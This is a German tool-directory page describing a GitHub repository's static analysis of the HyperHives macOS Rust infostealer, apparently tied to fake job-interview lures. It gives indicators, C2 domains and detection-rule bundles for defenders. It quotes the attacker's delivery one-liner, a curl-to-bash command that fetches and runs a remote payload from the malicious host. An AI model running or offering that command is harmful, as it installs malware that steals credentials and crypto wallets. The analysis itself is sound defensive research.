Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
hyperhives-macos-infostealer-analysis — Vollständige statische Analyse von HyperHives macOS Rust infostealer — 571 entschlüsselte Konfigurationswerte, C2-Infrastruktur, DPRK/Contagious Interview Attribution, YARA/Sigma-Regeln, STIX-2.1-Bundle, ATT&CK-Navigator-Layer | Kitploit
Tools/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
Management von Indicators of Compromise (IOC)OSINT (Open-Source-Intelligence)Reverse EngineeringForensikMalware-AnalyseBedrohungsanalysePapers & ForschungLernen & BildungKuratierte Ressourcen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

Vollständige statische Analyse von HyperHives macOS Rust infostealer — 571 entschlüsselte Konfigurationswerte, C2-Infrastruktur, DPRK/Contagious Interview Attribution, YARA/Sigma-Regeln, STIX-2.1-Bundle, ATT&CK-Navigator-Layer

Repository anzeigenWebseite
31413vor 5 MonatenVon Kitploit geprüft
Teilen

HyperHives macOS Infostealer — Vollständige technische Analyse

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

Bedrohungsinformationen: Rust-basierter macOS-Universal-Binary-Infostealer, der über eine gefälschte Job-Interview-Pipeline auf Wellfound (ehemals AngelList) ausgeliefert wird. Das Betreiber-Pseudonym „Felix" von „HyperHive" lockte Ziele dazu, einen schädlichen Installer von macos.hyperhives.net auszuführen. Dieses Repository dokumentiert eine vollständige statische Analyse: 571 entschlüsselte Konfigurationswerte wurden wiederhergestellt, darunter C2-URLs, eine Sentry-DSN und 276 gezielte Chrome-Erweiterungs-IDs.

Sample SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2-Domaincloudproxy.link
Auslieferungs-Domainmacos.hyperhives.net
Köder-PlattformWellfound (ehemals AngelList)
Betreiber-Persona„Felix" bei „HyperHive"
VirusTotal9 / 63 Erkennungen
KlassifizierungÖffentliche Offenlegung / IOC-Bundle
Zuletzt aktualisiertApril 2026

Inhalt

  • Bedrohungsinformationspakete
  • Repository-Struktur
  • Schnellstart
  • Kurzzusammenfassung
  • 1 – Wie es begann
  • 2 – Die Binärdatei
  • 3 – Was gestohlen wird
  • 4 – Entschlüsselte C2-Infrastruktur
  • 5 – Zuordnung
  • 6 – Kryptoanalyse
  • 7 – MITRE ATT&CK-Zuordnung
  • 8 – Wallet- und Erweiterungs-ID-Referenz
  • 9 – Empfohlene Maßnahmen
  • 10 – Methodik
  • Anhang A – Alle 276 Chrome-Erweiterungs-IDs
  • Umfang und Einschränkungen
  • Versionsgeschichte
  • Mitwirken
  • Lizenz

Bedrohungsinformationspakete

DateiFormatZweck
iocs.txtKlartextHashes, Domains, URLs, IPs, E-Mail, Sentry-IDs – zum Einfügen in Blocklisten, MISP, OpenCTI
yara_rules.yarYARA 4.2+Hash-Übereinstimmung bekannter Samples + heuristische Zeichenkettenerkennungen für Mach-O
sigma_rules.ymlSigmaProxy-, DNS- und Prozesserstellungsregeln – passen Sie logsource an Ihr SIEM an
stix/bundle.jsonSTIX 2.1Maschinenlesbares CTI-Bundle mit Indikatoren, Malware-SDO, Infrastruktur, ATT&CK-Mustern und Beziehungen
attack-navigator-layer.jsonATT&CK NavigatorImportieren Sie diese Datei in den ATT&CK Navigator, um eine visuelle Technikabdeckung zu erhalten

Repository-Struktur```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

---

## Schnellstart

Platziere die Beispiel-Datei als `sample/installer_binary` (siehe [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) zur Hash-Überprüfung), dann:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

Die Compose-Datei erzwingt network_mode: none, read_only: true und entfernt alle Linux Capabilities. Siehe SECURITY.md für die vollständigen Handhabungsrichtlinien.


TL;DR

Eine Stellenausschreibung auf Wellfound (ehemals AngelList) führte zu einer Multi-E-Mail-Social-Engineering-Kette von einer Betreiber-Persona "Felix" bei "HyperHive". Nachdem der Angreifer den technischen Hintergrund des Ziels geschmeichelt und ein gefälschtes Vorstellungsgespräch vereinbart hatte, forderte er das Opfer auf, das Produkt unter hyperhives.net zu „überprüfen“ und insbesondere Settings → Diagnostics → Log zu untersuchen – ein Vorwand, um die Ausführung von Folgendem auszulösen:``` curl -s https://macos.hyperhives.net/install | nohup bash &

Die Nutzlast ist ein **8,5 MB Mach-O Universal Binary** (x86_64 + arm64), kompiliert in Rust. Eine statische Analyse mit einer abgeschotteten Docker-Laborumgebung und CPU-Emulation von **570 eindeutigen x86_64-Helferroutinen** deckte **alle 571 verschlüsselten Konfigurationswerte** auf und legte offen:

- **C2:** `cloudproxy.link` — vier HTTPS-Endpunkte
- **Sentry (Attributions-Pivot):** vollständige DSN mit Org-/Projekt-IDs auf `ingest.de.sentry.io`
- **Build-Identität:** Cargo-Benutzer `rootr`, Codenamen `force`, Version `9.12.1`
- **Ziele:** 276 Chrome-Erweiterungs-IDs (Krypto-Wallets, Passwortmanager, Unternehmensanmeldedaten)

Die Taktiken decken sich mit **DPRK-verknüpften Contagious-Interview-Kampagnen** — vorgetäuschte Stellenanzeigen auf legitimen Plattformen, mehrstufiger Vertrauensaufbau, `curl | bash`-Auslieferung, Rust-macOS-Stealer und kryptofokussierte Exfiltration.

---

## 1 — Wie es begann
Tool herunterladen